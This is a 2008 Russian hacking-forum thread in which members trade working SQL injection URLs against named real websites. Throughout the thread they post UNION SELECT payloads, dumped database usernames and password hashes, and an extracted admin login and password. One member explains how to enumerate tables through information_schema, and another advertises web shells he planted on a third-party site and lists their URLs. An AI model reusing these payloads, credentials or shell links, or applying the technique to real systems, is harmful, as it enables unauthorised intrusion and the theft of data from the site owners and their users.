13.02.2008, 18:26
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
С нами:
9969506
Репутация:
252
|
|
Код:
http://www.superchrono.com/index.php?main_page=customer_testimonials&testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*
master@localhost:zenc:4.1.20
root:0015e5715c9d1718
vpopmail:1fbced3233935493
adminlink:186384a54d6ca922
master:5e80e4ce3bd7ea43
zic3cn:7231449d61b83801
zic2:7231449d61b83801
zicmasteruser:7231449d61b83801
Код:
http://store.workshopsupply.com/catalogue/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*
workshop_admin@localhost:workshop_workshopsupply:5 .0.45-community-log
Код:
http://www.mrgadget.com.au/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7/*
mrgad@203.202.10.76:mrgad_db:4.1.22-standard-log
Код:
http://www.bodyguardforwomenhearts.com/store/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*
bodyg_shop@localhost:bodyg_shop:4.1.22-standard-log
Код:
http://www.247av.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*
kunal060912@localhost:247av_com_-_newosc:4.1.22-standard
Последний раз редактировалось BizzyD; 13.02.2008 в 18:29..
|
|
|
13.02.2008, 20:17
|
|
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
С нами:
9613296
Репутация:
237
|
|
Черт, народ, это ханипот чтоли?) Мне понравилась страница, выскакивающая при подставлении на сайте кавычки.
http://www.hauteecole.ru/ru/horses.php?sid=0&id=5
Но ссылка заинтересовала. Таки скуля? 
*ушла искать как обойти эту фильтрацию*)))
Последний раз редактировалось Digital Cat; 13.02.2008 в 20:33..
|
|
|
|
14.02.2008, 00:22
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
[COLOR=White]http://galaxyit.ru/corp_systems/article_full.php?id=
4.1.22-standard/galaxyit_base/galaxyit_root@localhost
===================================
-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*
=====================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.mediafetcher.com/article_full.php?id=
====================================
5.0.26-Debian_2-log/uselessj_uj2006/uselessj_ohshitw@uj4.uselessjunk.com
===================================
-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*
=====================================
админка matt::diabl0::4
(-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3A3a,fld_ username,fld_password,fld_id),9,10,11,12,13,14%20, 15,16,17,18,19,20,21,22,23+from+tbl_admin/*)
Последний раз редактировалось xcedz; 14.02.2008 в 17:02..
|
|
|
|
14.02.2008, 03:06
|
Регистрация: 18.02.2006
Сообщений: 1,090
С нами:
10644806
Репутация:
1564
|
|
2xcedz если мускул >= 5 то можно работать через information_schema
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+0,1/*
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+1,1/*
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+2,1/*
итд... потом таким же образом вытаскиваеш названия колонок (column_name) |
|
|
|
14.02.2008, 10:46
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами:
9798146
Репутация:
1224
|
|
Код:
http://www.celadon-international.com/place.php?id=-1+union+select+1/*
http://www.travel-to-peloponese.com/place.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17/*
|
|
|
|
14.02.2008, 13:51
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
2xcedz and 2Mobile
Вы тему смотрите вообще? 0_o
На предидущей странице db_reader уже нашёл эту уязвимость и повыводил админов! Зачем боянить? Ладно б страницы 3 назад, так всего пару постов...
___________________________
Added:
Чтобы в тему:
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-125823+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,n ame,pwd,userid),8,9,10,11,12,13,14,15/*
Ну и лимитом выводим..
Последний раз редактировалось ThreeD; 14.02.2008 в 13:58..
|
|
|
|
14.02.2008, 17:04
|
Регистрация: 18.02.2006
Сообщений: 1,090
С нами:
10644806
Репутация:
1564
|
|
Сообщение от ThreeD
2xcedz and 2Mobile
Вы тему смотрите вообще? 0_o
На предидущей странице db_reader уже нашёл эту уязвимость и повыводил админов! Зачем боянить? Ладно б страницы 3 назад, так всего пару постов...
___________________________
Added:
Чтобы в тему:
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-125823+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,n ame,pwd,userid),8,9,10,11,12,13,14,15/*
Ну и лимитом выводим..
нафиг мне смотереть кучу однообразных инъекций?
просто я решил объяснить челу про information.schema а он оказывается уже знает...
|
|
|
|
14.02.2008, 14:30
|
|
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
С нами:
9613296
Репутация:
237
|
|
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/haute/domains/hauteecole.ru/public_html/shop/template/header.php on line 60
Мальчики, неужели вы обьявите мне игнор?  тут:
http://shop.hauteecole.ru/news.php?id=1'
Пыталась запросы вида:
http://shop.hauteecole.ru/news.php?id=1'+select+union+1,2,3,4,5,6/*
Или так, хотя один ли фиг:
http://shop.hauteecole.ru/news.php?id=1'%20select%20union%201,2,3,4,5,6/*
Мальчики, скажите мне, блондинке, как заставить этот долбаный мускуль выдать хоть какие-то результаты? Тупо подбирать столбцы, или надо извращаться?
Последний раз редактировалось Digital Cat; 03.03.2008 в 19:28..
|
|
|
|
14.02.2008, 14:31
|
|
Познающий
Регистрация: 23.11.2006
Сообщений: 79
С нами:
10245237
Репутация:
66
|
|
Залил шел на www.miheeff.ru мож кому надо, у него и подсайтов многа.
http://dvd.miheeff.ru/aaadmin.php
http://sms.miheeff.ru/sms_en.php
http://miheeff.ru/php.php
|
|
|
|
14.02.2008, 14:51
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
С нами:
9969506
Репутация:
252
|
|
Код:
http://www.dedefensa.org/choix.php?comm=1&link_id=99999+union+select+1,2,3,4,5,6,7,8,9/*
dedefensa@localhost:dedefensa:5.0.45 |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
